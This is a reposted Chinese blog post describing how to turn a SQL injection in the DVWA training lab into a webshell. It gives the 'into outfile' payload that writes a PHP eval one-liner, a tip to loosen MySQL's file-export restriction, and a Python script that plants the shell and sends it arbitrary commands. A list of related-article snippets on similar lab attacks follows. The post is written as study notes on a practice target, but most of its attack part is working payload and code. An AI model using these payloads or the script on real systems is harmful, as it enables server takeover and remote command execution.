DVWA从注入到GETSHELL

最新推荐文章于 2024-12-02 20:37:18 发布
转载 最新推荐文章于 2024-12-02 20:37:18 发布 · 563 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/s1ye/p/8214979.html
文章标签:

#shell #数据库 #php

本文介绍如何利用SQL注入漏洞写入WebShell,包括获取网站绝对路径、利用SQL注入写入WebShell的具体步骤及注意事项。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

好好过你的生活,不要老是忙着告诉别人你在干嘛。

 

最近在复习学过的东西,自己就重新搭了个dvwa来学习新思路,写一些简单的脚本来练习写代码的能力。

众所周知SQL注入的危害是相当大的,对于每个老司机来说,如果发现注入点并可以利用的话,除了脱裤当然是猜解出管理员的用户名密码,后台登陆上传webshell了,虽然这些过程并不一定一路通顺,只是一般的流程,中途会遇到各种各样的问题,这些以后再说,当我这个菜比都学会了在分享出来吧。

今天我们说说利用sql注入漏洞写入webshell。当我们发现了注入漏洞,但是却找不到后台,该怎么办呢,如果数据库管理员权限比较大的话,我们可以通过sql注入向网站写入shell。

写入webshell的前提条件:

1.select into outfile方法可用(允许导出文件)

2.我们需要知道网站所在的绝对路径

3.我们有足够的权限

首先我们确定了注入点,接下来就是爆一下网站的绝对路径: 

在输入框中输入,1' union select 'x','x' into outfile 'xx' -- 利用错误的sql语句,使数据库报错并返回绝对路径

现在已经获得了网站的绝对路径,接下来就是利用sql注入写shell了,在输入框中插入 1' union select "<?php @eval($_GET['cmd'])?>","hello admin" into outfile 'C:\\phpStudy\\PHPTutorial\\WWW\\dvwa\\hello.php' (需要注意,是两个"\") 点击提交,我们看一下是否上传成功

 

 

当我们输入 select 'xx' into outfile 'xxxx/xx/xx' -- 时 可能会遇到一下情况:

解决办法:找到my.ini文件 在最后一行加上一句 secure_file_prv="/"重启mysql即可。

 ============================================================附上自己写的自动化辣鸡代码=========================================================================

# -*- utf-8 -*-
import requests
import re


headers = {
	
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding':'gzip, deflate',
'Accept-Language':'zh-CN,zh;q=0.8',
'Cache-Control':'max-age=0',
'Connection':'keep-alive',
'Cookie':'security=low; PHPSESSID=pie6uqttjqtnadq1b5dp8640u1',
'Host':'192.168.86.129',
'Referer':'http://192.168.86.129/dvwa/security.php',
'Upgrade-Insecure-Requests':'1',
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'

}

url = raw_input('url:')
print '='*15,u'大爷稍等','='*15
payload = '%27+union+select+"<%3Fphp+%40eval%28%24_GET%5B%27cmd%27%5D%29%3F>"%2C"hello+admin"+into+outfile+%27C%3A%5C%5CphpStudy%5C%5CPHPTutorial%5C%5CWWW%5C%5Cdvwa%5C%5Chello.php%27+--+&Submit=Submit#'
url1 = requests.get(url+payload,headers=headers)
url2 = 'http://192.168.86.129/dvwa/hello.php'
url3 = requests.get(url2,headers=headers)
url4 = re.findall('<body>(.*?)</body>',url3.text)
if 'hello' in url3.text:
	print u'webshell已写入,路径为:http://192.168.86.129/dvwa/hello.php'
else:
	print u'写入失败'
print u'大爷您请便!'
url5 = 'http://192.168.86.129/dvwa/hello.php?cmd='
url6 = raw_input()
url7 = requests.get(url5+url6,headers=headers)
url8 = re.findall('<body>(.*?)</body>',url7.content)

print url7.content

  

 

 以此记录自己学过的知识,以防忘记,每天进步一点,共勉。

转载于:https://www.cnblogs.com/s1ye/p/8214979.html

DVWA和pikachu上获得getshell
SYJ_361的博客
12-24 2861
本文通过使用一句话木马对DVWA和pikachu上的文件上传漏洞,进行渗透,使用中国蚁剑进行连接,然后使用kali对目标进行渗透连接
DVWA之SQL注入
geejkse_seff的博客
07-30 445
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
pikachu漏洞平台学习笔记6_File Inclusion
qq_38933307的博客
04-01 315
1.概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once() require(),require_once() 这些文件包含函数,这些函数在代码设计中被经常使用到。 大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没
DVWA之从SQL注入到写入webshell
u011500307的专栏
10-28 8381
转自:http://www.nxadmin.com/penetration/1141.html 这篇文章谈论简单的技术,利用sql注入(SQLi)漏洞,并获得一个webshell,所有的演示都是用DVWA(渗透测试演练系统).对于SQL注入利用,有以下几个基本步骤: 1,发现SQL注入点; 2,通过mysql数据库帮助,进一步进行注入,获取帐号密码等敏感信息; 3,上传webshell
DVWA 不跳转_搭建dvwa环境学习从MySql注入GetShell
weixin_39759989的博客
11-20 242
引言一转眼从刚开始看关于安全的基础书籍到现在已经十个月的时间了,对渗透测试的兴趣也不断的增加,由于刚开始工作的需求,只来得及看一些常见漏洞的基本原理就开始跟随老师傅开始渗透测试的工作。现在还记得第一次自己发现 xss激动的心情,师傅领进门,学习到了很多知识,后来因为工作原因到了安服务项目上去,三月粗糙的渗透测试能力不足以支撑在项目上有很好的实践,而且由于项目经过其他渗透测试人员千百遍的洗礼比较严重...
DVWA通过SQL注入写入马儿及直接通过sqlmap获取shell避坑指南
qq_38053759的博客
12-29 3354
DVWA通过SQL注入写入马儿及直接通过sqlmap获取shell避坑指南 走过的坑,随手记下!!! 1. 通过sql注入写入木马文件 sql注入写入木马文件要求:1)secure-file-priv参数设置为空 2)写入的参数列名排序规则兼容 3) 知道服务器的绝对路径(路径要双写分隔符,避免被转义) 1....
DVWA之命令注入
极光时流
04-07 1292
DVWA之命令注入 Low 查看源码: ip参数没有做任何的过滤就直接放在shell_exec函数中执行了,执行语句为shell_exec( 'ping 127.0.0.1 && whami ')。(linux下使用whoami查看用户命令,windows使用net user) low级别的代码接收了用户输入的ip,然后根据服务器是否是Windows NT系统,对目标ip进行...
DVWA-命令注入漏洞获取目标shell并提到最高权限[msfvenom]
King_Ho的博客
12-21 3467
MSF攻击Windows实验: 方法一 :通过web站点,使用无文件的方式攻击利用执行 方法二:通过web站点,上传webshell, 返回给msf 方法三:攻击其他端口服务,拿到meterpreter 信息收集-Nmap端口扫描 信息收集总在前 root@kali:~# nmap -sV -T4 xxx.xxx.xxx.xxx Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-29 10:46 CST Not shown: 992 filtered p
Drupal 7.31SQL注入getshell漏洞利用详解及EXP
Coisini的博客
06-15 4054
0x00 这个漏洞威力确实很大,而且Drupal用的也比较多,使用Fuzzing跑字典应该可以扫出很多漏洞主机,但是做批量可能会对对方网站造成很大的损失,所以我也就只是写个Exp不再深入下去。 0x01 关于漏洞的原理和POC在我的博客上已经有文章进行解释,这里只是着重说一下利用过程。配合POC的效果,我主要是从远程代码执行和GetShell方面去做的利用。 远程代码执行利用: 1.使用超级管理...
dvwa命令注入
03-18
好的,我现在需要处理用户关于DVWA中命令注入漏洞的查询,包括示例和防御方法。首先,我需要回顾一下命令注入的基本概念以及DVWA中的相关设置。根据用户提供的引用内容,DVWA在低安全级别下没有防护措施,攻击者可以...
dvwa post注入
最新发布
03-28
另外,如果未明确指定 GET 或 POST 数据源,程序可能会询问是否尝试基于 URI 自身注入攻击路径[^4]。 #### 示例代码展示 下面给出一段完整的 shell 脚本形式调用示例: ```bash #!/bin/bash URL=...
【渗透练习系列】DVWA的一次登录后通过Sqlmap拿到os-shell,命令执行写入一句话-01
书山上的云的博客
01-19 4692
一、前言 本次将通过DVWA靶机来展示怎样通过Sqlmap获取目标os-shell,得到命令执行权限,从而写入一句话木马,持续控制目标服务器。 二、测试 1.打开目标站点:http://192.200.30.126/DVWA/login.php,从网页后缀和wappalyzer浏览器插件来看,站点的编程语言为PHP。 2.输入账号跟密码登录后台,同时开启Burp抓取http包。 获取登录后的Cookie值: 3.找到存在SQL注入的模块。获取URL。 http://192.200.30.126/DVWA/v
基于SQL注入漏洞读写文件Getshell技巧
道阻且长,行则将至
06-28 2359
文章目录前言手工注入靶场环境into outfileSQLMap靶场环境--os-shell读写文件总结 前言 在 HW 行动和攻防演练过程中,获得 Shell 的方式总结起来大概是以下几种(当然了如果能够通过源码泄露审计出 0day 的大佬的姿势另说……): 暴力破解+弱口令/未授权访问漏洞登录后台,任意文件上传漏洞 Getshell; Shiro、Struts2、Fastjson 等反序列化漏洞导致 RCE; 通过 SQL 注入漏洞写入木马文件并 Getshell…… 在前面一篇文章:渗透测试-Ph
DVWA文件包含漏洞
西电卢本伟的博客
03-30 2896
文章目录lowmediumhighimpossible文件上传+包含漏洞getshell云演-phar实验 low 1、本地文件包含: 看看后端代码 <?php // The page we wish to display $file = $_GET[ 'page' ]; ?> 发现没有对参数page进行任何的检查和过滤,尝试包含一下phpinfo.php文件 提示错误,但是爆出了文件的绝对路径,此时有两种方法成功包含文件 方法一:利用得到的绝对路径 方法二:利用相对路径 2、远程
文件包含漏洞
Williamanddog的博客
01-29 333
程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需 再次编写,这种文件调用的过程一般被称为文件包含。程序开发人员一般希望代码更灵活,所以将被包 含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意 文件,造成文件包含漏洞。 在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件, 导致意外的文件泄露甚至恶意的代码注入。 。
DVWA-->01
2201_75556700的博客
12-02 1220
2、上传失败了,因为它不是真正的图片,所以,接下来,我们用一张真的图片,但是在图片里面添加php代码,将图片修改为txt添加完代码之后再改为png。5、文件包含访问刚刚上传的文件,看看能不能执行里面的php代码,成功访问到了文件,并且执行了php代码。3、以“../”跳转目录的方式,包含想访问的文件,的页面没有反应时,多输入几次../甚至更多次。6、得到上传成功的文件路径,开始包含文件,成功包含文件,并执行了php代码,拿到了shell。3、上传.txt文本的php代码,发现上传失败,只能上传图片。
SQL注入GetShell的方法(1)
forinput的博客
05-06 5267
SQL注入getshell的五中方式
DVWA命令执行漏洞详解
nex1less的博客
07-19 1569
0x01 级别low 1.源码 Command Execution Source <?php if( isset( $_POST[ 'submit' ] ) ) { $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping command. if (stristr(php...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值